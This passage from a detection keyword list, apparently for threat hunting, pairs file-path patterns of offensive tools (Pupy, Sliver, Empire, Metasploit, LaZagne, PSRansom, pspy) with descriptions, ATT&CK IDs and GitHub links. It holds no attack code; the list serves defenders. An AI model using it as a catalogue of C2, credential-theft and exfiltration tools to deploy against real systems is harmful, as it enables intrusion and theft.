T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/proxy/Tor.py*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*/proxy/tor_paths.py*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z 
-*/Proxy_Def_File_Generator.cna*,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,1,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*/proxychains.git*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,1,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*/proxymaybeshell*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ps_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/ps1_oneliner.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/PS2EXE.git*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*/ps2exe.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/PS2EXE/*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*/ps-empire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - 
T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/psexec.json*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/psnuffle*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PSpersist.git*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,1,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*/pspy -*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*/PSPY.dll*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,1,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*/pspy.git*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z
-*/pspy.go*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z
-*/pspy/cmd*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z
-*/pspy32*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z
-*/pspy64*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z
-*/PSRansom -*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. 
you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,Ransomware,https://github.com/JoelGMSec/PSRansom,1,0,N/A,N/A,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z
-*/psscanner.go*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z
-*/PSSW100AVB*,offensive_tool_keyword,PSSW100AVB,This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio,T1548 T1562 T1027,N/A,N/A,N/A,Defense Evasion,https://github.com/tihanyin/PSSW100AVB,1,1,N/A,N/A,10,983,166,2022-06-18T16:52:38Z,2021-10-08T17:36:24Z
-*/pswRecovery4Moz.txt*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z
-*/ptunnel-ng*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z
-*/puckiestyle/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/puckiestyle/CVE-2022-0847,1,1,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z
-*/puppet-naivesigning.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/pupwinutils/*.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupy/*.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupy/commands/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupy/memimporter/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupy/output/pupyx64*.exe*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupy/pupygen.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupy_load.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/PupyCmd.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/PupyCompile.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupygen.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupylib/payloads/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/PupyOffload.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupyps.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/PupyServer.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/PupyService.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/pupysh.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/PupyTriggers.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/PupyWeb.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/putter.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
